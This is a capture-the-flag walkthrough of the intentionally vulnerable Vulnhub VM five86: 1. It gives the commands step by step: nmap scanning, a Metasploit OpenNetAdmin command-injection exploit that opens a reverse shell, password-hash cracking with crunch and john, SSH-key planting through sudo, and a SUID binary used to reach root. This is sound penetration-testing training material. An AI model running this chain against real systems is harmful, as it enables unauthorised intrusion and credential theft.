five86: 1 Walkthrough Vulnhub CTF
Today we are solving five86: 1 is created by DCAUC and This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. five86 1 walkthrough
Download here five86: 1
Network Scanning
our first step is to identify the target IP address we will initiate with netdiscover.
netdiscover

Nmap Aggressive scan. All port and services. and wee see target machine port 22 ssh, 80 http, 10000 Webmin httpd service is running
nmap -A 192.168.1.7

Enumeration
enumerating port 80 http service we open the IP address in the web browser
we see the /ona directory look like openNetAdmin service is running I go to about page and we see the openNetAdmin version.
http://192.168.1.7/ona

we go to exploit-db and search openNetAdmin v18.1.1 and I found a command injection exploit now I download the exploit our local system

adding exploit msfconsole copy our exploit Download directory to Metasploit directory
cp /root/Downloads/47772.rb /usr/share/metasploit-framework/modules/exploits/
msfconsole

use exploit/47772
set rhosts 192.168.1.7
set lhost 192.168.1.4
run
our session 1 is open and we got a reverse connection target machine

The shell it gave was not proper so to fix that we run the Python One-Liner. As this machine was loaded with the Python3, we need to use the Python3 variant of the One-Liner. for proper shell
shell
python -c 'import pty;pty.spawn("/bin/bash")'
id

ls -lsa command to check all hidden file and directory and I open .htpasswd file
ls -lsa
cat .htpasswd

Privilege Escalation
cat hash
Creating a wordlist using crunch and length is 10 and use target password character
crunch 10 10 aefhrt >word.txt

Try to crack the hash file with john using our custom wordlist
john --wordlist=word.txt hash

our hashes are crack now changing our shell www-data to user douglas and successfully login with douglas account.
su douglas
run sudo -l to check for commands that can run as sudo. It looks like dpkg can run as sudo.
sudo -l

Generating an ssh key for our second user
ssh-keygen -b 2048
I copying this key target machine /tmp directory and changing name authorized_keys
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys

After Creating key now changing the permission this file and copy our second user jen /home/jen/.ssh directory
cd /tmp
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/

Try to connecting ssh connection without any password and us successfully login with Jen user
ssh [email protected]

After try many directory enumeration I found a mail massage
cd /var/mail
ls
cat jen

changing user Jen to the moss with the password found in the mail message
su moss
find /home -type f -perm -u=s 2>/dev/null
cd /home/moss/.games/

./upyourgame
cd /root
cat flag.txt
